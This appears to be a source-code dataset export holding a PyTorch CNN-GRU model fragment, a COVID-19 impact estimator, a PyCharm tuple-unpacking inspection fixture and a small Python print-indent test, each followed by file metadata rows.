nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46
nn.ReLU(),
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21
nn.ReLU()
)
self.cnn_1d_part2=nn.Sequential(
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9
nn.ReLU(),
nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4
nn.ReLU(),
nn.AdaptiveMaxPool1d(1)
)
self.num_of_behs = 5
self.hidden_sz = 128
self.num_layers = 2
self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers)
self.fc_out = nn.Sequential(
nn.Linear(self.hidden_sz, int(self.hidden_sz/2)),
nn.ReLU(),
nn.Linear(int(self.hidden_sz/2), self.num_of_behs)
)
def forward(self, x_input):
x_cnn_output1 = self.cnn_1d(x_input)
x_cnn_output2 = self.cnn_1d_part2(x_cnn_output1)
x = x_cnn_output2.view(x_cnn_output2.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128)
x_input_to_seq = torch.unsqueeze(x, 1)
# change to the input of seq model (seq_len, batch, input_size):
batch_sz = x_input_to_seq.shape[1]
h_init = self.initHidden(batch_sz)
x, hidden = self.gru1(x_input_to_seq , h_init)
x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem
return x_ouput
def initHidden(self, batch_sz):
return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device)
class model_cnn_seq_CMU_pretrained_N4(nn.Module):
def __init__(self, in_channels_num):
super(model_cnn_seq_CMU_pretrained_N4, self).__init__()
self.cnn_1d=nn.Sequential(
nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46
nn.ReLU(),
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21
nn.ReLU(),
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9
nn.ReLU(),
nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4
nn.ReLU(),
nn.AdaptiveMaxPool1d(1)
)
self.num_of_behs = 5
self.hidden_sz = 128
self.num_layers = 2
self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers)
self.fc_out = nn.Sequential(
nn.Linear(self.hidden_sz, int(self.hidden_sz/2)),
nn.ReLU(),
nn.Linear(int(self.hidden_sz/2), self.num_of_behs)
)
def forward(self, x_input):
x_cnn_output1 = self.cnn_1d(x_input)
x = x_cnn_output1.view(x_cnn_output1.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128)
x_input_to_seq = torch.unsqueeze(x, 1)
# change to the input of seq model (seq_len, batch, input_size):
batch_sz = x_input_to_seq.shape[1]
h_init = self.initHidden(batch_sz)
x, hidden = self.gru1(x_input_to_seq , h_init)
x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem
return x_ouput
def initHidden(self, batch_sz):
return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device)
| 40.541463
| 119
| 0.586572
| 1,241
| 8,311
| 3.659952
| 0.097502
| 0.05284
| 0.063408
| 0.05284
| 0.945839
| 0.945839
| 0.935931
| 0.935931
| 0.935931
| 0.935931
| 0
| 0.056547
| 0.278667
| 8,311
| 204
| 120
| 40.740196
| 0.701084
| 0.172422
| 0
| 0.838926
| 0
| 0
| 0.001024
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080537
| false
| 0
| 0.020134
| 0.026846
| 0.181208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fab758dc8f7ee10af088488b1baa483e1f8234ed
| 5,441
|
py
|
Python
|
src/djangoEstimator/periodtype.py
|
ronjones340/andelas
|
8d5212f211eb9735db3d154fff942f0fccdb6d48
|
[
"MIT"
] | null | null | null |
src/djangoEstimator/periodtype.py
|
ronjones340/andelas
|
8d5212f211eb9735db3d154fff942f0fccdb6d48
|
[
"MIT"
] | 1
|
2021-05-11T10:32:40.000Z
|
2021-05-11T10:32:40.000Z
|
src/djangoEstimator/periodtype.py
|
ronjones340/andelas
|
8d5212f211eb9735db3d154fff942f0fccdb6d48
|
[
"MIT"
] | null | null | null |
from math import trunc
def days(data):
impact = {}
severeImpact = {}
impact['currentlyInfected'] = data['reportedCases'] * 10
severeImpact['currentlyInfected'] = data['reportedCases'] * 50
impact['infectionsByRequestedTime'] = impact['currentlyInfected'] * pow(2, trunc(data['timeToElapse'] / 3))
severeImpact['infectionsByRequestedTime'] = severeImpact['currentlyInfected'] * pow(2, trunc(data['timeToElapse'] / 3))
impact['severeCasesByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.15)
severeImpact['severeCasesByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.15)
availablebeds = trunc(data['totalHospitalBeds'] * 0.35)
impact['hospitalBedsByRequestedTime'] = availablebeds - impact['severeCasesByRequestedTime']+1
severeImpact['hospitalBedsByRequestedTime'] = availablebeds - severeImpact['severeCasesByRequestedTime']+1
impact['casesForICUByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.05)
severeImpact['casesForICUByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.05)
impact['casesForVentilatorsByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.02)
severeImpact['casesForVentilatorsByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.02)
impact['dollarsInFlight'] = trunc((impact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse'])
severeImpact['dollarsInFlight'] = trunc((severeImpact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse'])
result = {
'data': data,
'impact': impact,
'severeImpact':severeImpact
}
return result
def weeks(data):
impact = {}
severeImpact = {}
impact['currentlyInfected'] = data['reportedCases'] * 10
severeImpact['currentlyInfected'] = data['reportedCases'] * 50
impact['infectionsByRequestedTime'] = impact['currentlyInfected'] * pow(2, trunc(data['timeToElapse'] *7 / 3))
severeImpact['infectionsByRequestedTime'] = severeImpact['currentlyInfected'] * pow(2, trunc(data['timeToElapse']*7/ 3))
impact['severeCasesByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.15)
severeImpact['severeCasesByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.15)
availablebeds = trunc(data['totalHospitalBeds'] * 0.35)
impact['hospitalBedsByRequestedTime'] = availablebeds - impact['severeCasesByRequestedTime']+1
severeImpact['hospitalBedsByRequestedTime'] = availablebeds - severeImpact['severeCasesByRequestedTime']+1
impact['casesForICUByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.05)
severeImpact['casesForICUByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.05)
impact['casesForVentilatorsByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.02)
severeImpact['casesForVentilatorsByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.02)
impact['dollarsInFlight'] = trunc((impact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse'])
severeImpact['dollarsInFlight'] = trunc((severeImpact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse'])
result = {
'data': data,
'impact': impact,
'severeImpact':severeImpact
}
return result
def months(data):
impact = {}
severeImpact = {}
impact['currentlyInfected'] = data['reportedCases'] * 10
severeImpact['currentlyInfected'] = data['reportedCases'] * 50
impact['infectionsByRequestedTime'] = impact['currentlyInfected'] * pow(2, trunc(data['timeToElapse']*30/ 3))
severeImpact['infectionsByRequestedTime'] = severeImpact['currentlyInfected'] * pow(2, trunc(data['timeToElapse']*30/ 3))
impact['severeCasesByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.15)
severeImpact['severeCasesByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.15)
availablebeds = trunc(data['totalHospitalBeds'] * 0.35)
impact['hospitalBedsByRequestedTime'] = availablebeds - impact['severeCasesByRequestedTime']+1
severeImpact['hospitalBedsByRequestedTime'] = availablebeds - severeImpact['severeCasesByRequestedTime'] + 1
impact['casesForICUByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.05)
severeImpact['casesForICUByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.05)
impact['casesForVentilatorsByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.02)
severeImpact['casesForVentilatorsByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.02)
impact['dollarsInFlight'] = trunc((impact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse'])
severeImpact['dollarsInFlight'] = trunc((severeImpact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse'])
result = {
'data': data,
'impact': impact,
'severeImpact':severeImpact
}
return result
| 70.662338
| 194
| 0.736813
| 398
| 5,441
| 10.072864
| 0.100503
| 0.116737
| 0.107758
| 0.083063
| 0.990771
| 0.990771
| 0.990771
| 0.990771
| 0.989274
| 0.989274
| 0
| 0.020604
| 0.11689
| 5,441
| 77
| 195
| 70.662338
| 0.813736
| 0
| 0
| 0.821918
| 0
| 0
| 0.468026
| 0.31753
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041096
| false
| 0
| 0.013699
| 0
| 0.09589
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
faceb4a7e5182ecb91fa809d8a2314d489b407c1
| 282
|
py
|
Python
|
python/testData/inspections/PyTupleAssignmentBalanceInspection/py4358.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyTupleAssignmentBalanceInspection/py4358.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyTupleAssignmentBalanceInspection/py4358.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
a, b = <warning descr="Too many values to unpack">[1, 2, 3]</warning>
a, b = <warning descr="Too many values to unpack">'str'</warning>
a, b = <warning descr="Too many values to unpack">{1, 2, 3}</warning>
a, b = <warning descr="Too many values to unpack">{1:2, 2: 3, 3:4}</warning>
| 70.5
| 76
| 0.648936
| 53
| 282
| 3.45283
| 0.264151
| 0.043716
| 0.196721
| 0.306011
| 0.923497
| 0.923497
| 0.923497
| 0.923497
| 0.923497
| 0.923497
| 0
| 0.05
| 0.148936
| 282
| 4
| 76
| 70.5
| 0.7125
| 0
| 0
| 0
| 0
| 0
| 0.363958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
faf68a4c49d6ca83f7a9567e415a06f7e8620d4c
| 185
|
py
|
Python
|
rasengan/test_print.py
|
se4u/rasengan
|
9b327b207559b829fcb870f80e6e0df7c6394ca5
|
[
"MIT"
] | 1
|
2017-12-07T20:12:21.000Z
|
2017-12-07T20:12:21.000Z
|
rasengan/test_print.py
|
se4u/rasengan
|
9b327b207559b829fcb870f80e6e0df7c6394ca5
|
[
"MIT"
] | null | null | null |
rasengan/test_print.py
|
se4u/rasengan
|
9b327b207559b829fcb870f80e6e0df7c6394ca5
|
[
"MIT"
] | null | null | null |
import rasengan
rasengan.setup_print_indent()
rasengan.increase_print_indent()
print 1
print '1'
rasengan.increase_print_indent()
print '2'
rasengan.decrease_print_indent()
print '123'
| 18.5
| 32
| 0.827027
| 26
| 185
| 5.576923
| 0.384615
| 0.303448
| 0.331034
| 0.372414
| 0.441379
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0.075676
| 185
| 9
| 33
| 20.555556
| 0.812866
| 0
| 0
| 0.222222
| 0
| 0
| 0.027027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.111111
| null | null | 0.888889
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.